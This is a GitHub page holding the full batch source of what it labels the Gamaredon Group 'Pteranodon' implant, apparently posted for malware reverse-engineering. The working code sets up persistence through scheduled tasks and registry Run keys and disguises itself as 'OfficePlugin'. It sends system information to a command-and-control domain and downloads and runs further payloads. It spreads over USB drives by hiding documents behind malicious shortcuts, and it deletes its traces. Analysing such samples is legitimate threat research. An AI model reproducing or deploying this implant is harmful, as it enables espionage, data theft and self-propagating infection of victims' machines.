Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Malware-Misc-RE/2019-04-13-Gamaredon-Group-Pteranodon-Implant-$1_c.01.cmd

Go to file
 
 
Cannot retrieve contributors at this time
359 lines (282 sloc) 9.42 KB
Raw Blame
Open in GitHub Desktop
REM @VK_Intel
REM MD5: 7ac3a99fb79ec2143900afa73c47b243
REM Self-extractable executable
@echo off
setlocal ENABLEDELAYEDEXPANSION
set vers=%1_c.01 REM implant version
set ver=%vers%
set updata=%1.tmp
set /a maxword=10
set /a maxword1=10
set /a maxtxt=10
set /a maxjpg=10
set files=zoom.exe
set telotroyan=bootstat.dat REM trojan body - bootst
set chromus=OfficePlugin REM masked as OfficePlugin
REM URL http://updates-spreadwork.pw
REM set domenus1=http://
REM set domenus2=updates-
REM set domenus3=spreadwork.pw
call :prosesstron %files%
ping 127.0.0.1
For /F "Tokens=2 Delims=[]" %%i In ('ver') Do (
For /F "Tokens=2,3 Delims=. " %%a In ("%%i") Do Set versions=%%a.%%b
)
If "%versions%"=="5.1" goto xpos
set chromusdir=%APPDATA%\Microsoft\Office\Plugin
set param222=/SC MINUTE /MO 10 /F
goto viber
:xpos
set chromusdir=%WINDIR%\Microsoft\Office\Plugin
set param222=/SC MINUTE /MO 10 /RU "SYSTEM"
goto viber
:viber
if not exist "%chromusdir%\*.*" MD "%chromusdir%"
copy "%files%" "%chromusdir%\%chromus%.exe" /y
del /f /q "%chromusdir%\*.tmp"
schtasks /Query /tn %chromus%
if errorlevel 1 (
schtasks /Create %param222% /tn %chromus% /tr "%chromusdir%\%chromus%.exe"
)
REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v %chromus% | Find "%chromusdir%\%chromus%.exe"
If %ERRORLEVEL% == 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v %chromus% /t REG_EXPAND_SZ /d "%chromusdir%\%chromus%.exe" /f
)
:spread
setlocal enabledelayedexpansion
set nabor=qQwWeErRtTyYuUiIoOpPaAsSdDfFgGhHjJkKlLzZxXcCvVbBnNmM1234567890
set long=15
call :writePwd downlist.txt
setlocal enableextensions enabledelayedexpansion
ping 8.8.8.8 |>nul find /i "TTL=" &&goto otsetup||goto capiton
:otsetup
taskkill /f /im ImagingDevices.exe
setlocal enabledelayedexpansion
schtasks /Query /TN StateBinDLL /XML | find /i "command" > "%CD%\statebin.ini"
for %%i in ("%CD%\statebin.ini") do (
if %%~zi==0 (
set ver=NO_DLLS-%ver%
goto metka
)
)
set /p x=<"%CD%\statebin.ini"
set /p "x=%x:~15,-10%"<nul >"%CD%\statebin.ini"
set /p tmps=<"%CD%\statebin.ini"
if %tmps%==rundll32.exe goto updll2
:updll
if not exist "%tmps%" (set ver=NO_DLLS-%ver%)
:metka
For /F "Tokens=4*" %%B In ('vol c:') Do set updates=%%B
if errorlevel 1 set updates=00000-00000
set comments=%updates:-=%
systeminfo /FO TABLE /NH > system.ini
FOR /F "tokens=*" %%i IN (system.ini) do @IF NOT X%%i==X set infosys=!infosys!%%i+###
set IDs=%computername%_%comments%
set IDs=%IDs: =%
setlocal
set ID=0
For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j
set flashid=%ID%
if %ID%==0 set flashid=000000
http://updates-spreadwork.pw
set domenus1=http://
set domenus2=updates-
set domenus3=spreadwork.pw
set /p down=<downlist.txt
ImagingDevices.exe --post-data="versiya=%ver%&comp=%computername%&id=%IDs%&sysinfo=%infosys%&fid=%flashid%" "%domenus1%%domenus2%%domenus3%" -q -N %domenus1%%domenus2%%domenus3% -O %down%
for %%i in (%down%) do (set /a size=%%~Zi)
if %size%==0 goto capiton
if %size% LEQ 30000 goto updat
start /b %down%.exe
goto capiton
:updat
set /p zagr=<%down%
If %ERRORLEVEL% == 0 (
ImagingDevices.exe "%zagr%/%updata%"
copy "%updata%" "%chromusdir%\%chromus%.tmp" /y
call kill.cmd %chromusdir% %chromus%
)
:capiton
setlocal
set ID=0
For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j
if %ID%==0 goto outlog
If Not Exist %USB% goto outlog
if not exist %USB%\* goto outlog
If Not Exist "%chromusdir%\%ID%.usb" call :ZarFlash
set papka=Recycle
set directors=%USB%\%papka%
If Not Exist %directors% (
MD %directors%
attrib +h %directors%
)
REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden | Find "0x2"
If %ERRORLEVEL% == 1 (
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 00000002 /f
)
REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt | Find "0x0"
If %ERRORLEVEL% == 1 (
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v HideFileExt /t REG_DWORD /d 00000000 /f
)
setlocal enabledelayedexpansion
attrib -h "%USB%\*.*" /s
for %%F in (disk.inf pagefile.sys ntuser.ini disk.trashinfo boot.sys win.ini usb.ini ntuser.log ntuser.sys bootstat.dat) do (
for /f "Tokens=1* Delims=" %%a in ('dir /b/s %USB%\%%F') do (
copy "%files%" "%%a" /y
attrib +h "%%a"
)
)
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.exe"') do (copy "%files%" "%%r" /y)
)
set rashirenie=doc.lnk
call :delsrashlnks %rashirenie% %USB%
set rashirenie=docx.lnk
call :delsrashlnks %rashirenie% %USB%
set rashirenie=txt.lnk
call :delsrashlnks %rashirenie% %USB%
set rashirenie=jpg.lnk
call :delsrashlnks %rashirenie% %USB%
for /f "Tokens=1* delims=" %%g in ('dir /b/s "%USB%\*.lnk.lnk"') do (ren "%%g" "%%~ng")
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y)
for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do (
set LINKS=%%K
)
if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=1
set rash=doc
set /a pred=%maxword%
call :firstaction %ico% %rash% %pred% %USB%
for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do (
set LINKS=%%K
)
if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=1
set rash=docx
set /a pred=%maxword%
call :firstaction %ico% %rash% %pred% %USB%
set LINKS=%SystemRoot%\system32\SHELL32.dll
set /a ico=70
set rash=txt
set /a pred=%maxtxt%
call :firstaction %ico% %rash% %pred% %USB%
set LINKS=%SystemRoot%\system32\SHELL32.dll
set /a ico=302
set rash=jpg
set /a pred=%maxjpg%
call :firstaction %ico% %rash% %pred% %USB%
for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do (
set LINKS=%%K
)
if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=1
set rash=doc
set /a pred=%maxword1%
set i=0
set num=0
set flashdirectors=%USB%
for %%j in ("!flashdirectors!\*.lnk") do (set /a num+=1)
for %%f in ("!flashdirectors!\*.doc") do (
set /a i+=1
if /I !num! LEQ %pred% (
if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%")
)
)
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y)
attrib +h %USB%\%telotroyan% /s
attrib +h %%directors%%
:outlog
taskkill /f /im mshta.exe
for /r "%TEMP%" %%d in (.) do dir /b "%%~d" | find /v "">nul || rd /s /q "%%~d"
del /f /q "%CD%\*.*"
exit
:firstaction
for /f "delims=" %%d in ('dir /b/s/ad "%USB%"') do (
set i=0
set num=0
for %%j in ("%%d\*.lnk") do (set /a num+=1)
if /i not %%d==%directors% set flashdirectors=%%d
for %%f in ("!flashdirectors!\*.%rash%") do (
set /a i+=1
if /I !num! LEQ %pred% (
if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%")
)
)
)
EXIT /B
:actions
chcp 1251 >nul
if /I !num! GEQ %pred% (exit /B)
set RAN=%RANDOM%
copy /y "%~1" "%directors%\FILE%RAN%.%rash%"
set starts=\%papka%\FILE%RAN%.%rash%
set startfill="/C %starts% & attrib -h %telotroyan% & start %telotroyan%"
copy %files% "!flashdirectors!\%telotroyan%" /y
start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%~1.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%startfill%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()")
del /f /q "%~1"
EXIT /B
:TestDisk
Set $%1=%2
If %1==VolumeSerialNumber If Defined $%1 (Set USB=%$Name%& Set ID=%$VolumeSerialNumber%)
EXIT /B
:ZarFlash
copy %files% "%USB%\%telotroyan%" /y
set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=3
set lnkfiles="/C %windir%\explorer.exe & attrib -h %telotroyan% & start %telotroyan%"
start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%USB%\%date%.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%lnkfiles%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()")
cd.>"%chromusdir%\%ID%.usb"
attrib +h "%USB%\%telotroyan%"
EXIT /B
:prosesstron
setlocal ENABLEDELAYEDEXPANSION
set read=0
set mn=%~nx0
for /f "usebackq tokens=1* delims==" %%A IN (`wmic process get parentprocessid^, commandline /value`) DO (
if "!read!"=="1" (
if "%%A"=="ParentProcessId" (set prntid=%%B)
)
if "%%A"=="CommandLine" (
set cmdln=%%B
if not "!cmdln:%mn%=!"=="!cmdln!" (
set read=1
) else (
set read=0
)
)
)
SET /a pid=%prntid%
FOR /f "skip=3delims=" %%a IN ('tasklist') DO (
SET "found=%%a"
SET /a foundpid=!found:~26,8!
SET /a foundpid=!found:~26,8!
IF %pid%==!foundpid! set ParentName=!found:~0,24%!
)
set "ProcName=%ParentName: =%"
for /f "tokens=1* delims==" %%i in ('
wmic process where "Name='%ProcName%'" get ExecutablePath /value^| findstr :
') do set ExecutablePath=%%j
copy "%ExecutablePath%" "%files%" /y
EXIT /B
:delsrashlnks
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.!rashirenie!"') do (
xcopy /d /q /y "%rashirenie%" "%%r"
)
EXIT /B
:updll2
schtasks /Query /TN StateBinDLL /XML | find /i "arguments" > "%CD%\statebin.ini"
set /p y=<"%CD%\statebin.ini"
set /p "y=%y:~17,-10%"<nul >"%CD%\statebin.ini"
set /p tmps=<"%CD%\statebin.ini"
goto updll
:writePwd
set Pwd=
for /L %%A IN (1,1,%long%) DO (
call :getRandS
set Pwd=!Pwd!!rands!
)
echo.%Pwd%>>"%~1"
exit /b
:getRandS
set /a RandKey=%RANDOM% %% 62
set rands=!nabor:~%RandKey%,1!
exit /b